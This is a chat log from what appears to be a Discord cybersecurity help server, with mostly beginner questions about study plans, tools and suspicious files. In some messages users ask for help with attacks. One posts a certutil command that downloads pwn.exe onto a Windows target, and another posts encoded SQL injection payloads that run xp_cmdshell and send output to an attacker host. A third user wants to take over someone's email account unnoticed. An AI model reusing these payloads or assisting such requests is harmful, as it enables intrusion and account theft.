I found this one at Best Buy I can pick up today but is the same or a different one (TP-Link - AX1800 Nano Wi-Fi 6 Wireless USB Adapter) @chilly merlin

subtle tundra
#

is there a national public data records breach download or atleast checker for myself?

zenith depot
#

Hey, can someone tell me wich study plan should i follow in tryhackme before i try to go into the red teaming path?

shell sinew
#

you got roadmap here

zenith depot
#

ooooh ok

#

ty

chilly merlin
tame spruce
tame spruce
#

Tmw

tame spruce
chilly merlin
#

Jus don't

vapid dew
#

lol

#

I wanna to ask

#

damn

chilly merlin
vapid dew
#

bot continue delete msg

chilly merlin
#

?

vapid dew
mortal nova
#

hey everyone im new to cybersecurity any recommendations on what I should be focussing on in terms of basics?

chilly merlin
#

Morse

silent smelt
#

anyone help in msql i got xp_cmdshell in a window sever cant get a reverse shell

silent smelt
#

os-shell> certutil.exe -urlcache -f http://192.168.1.119/pwn.exe C:\Users\Public\pwn.exe
do you want to retrieve the command standard output? [Y/n/a] y
[23:28:40] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[23:30:10] [CRITICAL] connection timed out to the target URL

half tusk
#

is there any way to fuzz mutiple urls using ffuf ?

half tusk
#

no its fine dw

#

well i found a solution by trying a bash script

#

like this
for URL in $(<urls.txt); do ( fuff -u "${URL}/FUZZ" -w wordlist -ac ); done

#

lol sry

#

alr ill try it out

languid sleet
#

need help with understanding a dns map

shell sinew
languid sleet
shell sinew
#

I've never used it but lemme take a look

languid sleet
shell sinew
#

ok

analog siren
#

i just got a flipper zero and dont know where to start can someone help also when i insert the microSD card it wont fully go in it i have to hold it down

dreamy vine
#

lost my disocrd account

sweet bluff
#

pls fucking help me theres chrome extension highjakcere cant delete tried deletnig it regedit wont work, rank my shit in safe mode won't work either what do i do

chrome schooner
#

Hey, I need some help with a reverse shell. I'm able to execute commands using xp_cmdshell, and I can succesfully retrieve command results via an OOB method: '%3b%20EXEC%20master.dbo.xp_cmdshell%20'for%20%2ff%20%25i%20in%20(''powershell.exe%20whoami'')%20do%20curl%20http%3a%2f%2fMY_IP%2f%3fid%3d%25i%3b--%20
But writing to a file, or downloading anything doesnt work, ex: '%3b%20EXEC%20master.dbo.xp_cmdshell%20'for%20%2ff%20%25i%20in%20(''powershell.exe%20echo%201337%20>%20C:\\Windows\\Temp\\foo.txt'')%20do%20curl%20http%3a%2f%2fMY_IP%2f%3fid%3d%25i%3b--%20

uncut wedge
zenith depot
#

hey guys i have a question

#

what would be a good study plan to have the sufficient level to do the red teaming certificate from thm?

plucky patio
mortal nova
#

What do you mean by Fundamental Concept? @plucky patio

odd relic
#

I wanna learn how to make cashapp money

tame trail
#

hello ppl somebody please put me on email hacking game i mean for educational purposes only

clever ibex
#

what do you mean?

sick swift
clever ibex
#

lol

tame trail
#

i want to get my targets password or change it without their notice

fathom laurel
tepid pivot
#

theHarvester , can you help me about theHarvester how to use it and please can you explain it guys

tame trail
#

thanks what im lookings for is recommandations not assitsance in that manner ill do futher research on that

wanton marsh
fleet comet
versed spruce
#

Random question: I unzipped a zip file (yep, has .zip) and for a second I saw a folder named ".AU.uj4jU.nosync" appear and then disappear which was not a file I expected to appear when unzipping the file. Should I be panicking or no? If so, what should I do?

Context: saved the file in google drive
FAQ: are my file extensions on? yes, so it's not a fake zip file

#

alright tysm! im currently scanning it in virus total rn (it's a big file, supposed to contain lots of images and 2 csv files)

your explanation is really clear :D

#

No security vendors flagged this file as malicious
Should I wait for the sandboxes or no? (sandbox option doesn't show up)

#

do you have any other antiviruses that you would suggest I check?

#

alright I'll check those out too tysm!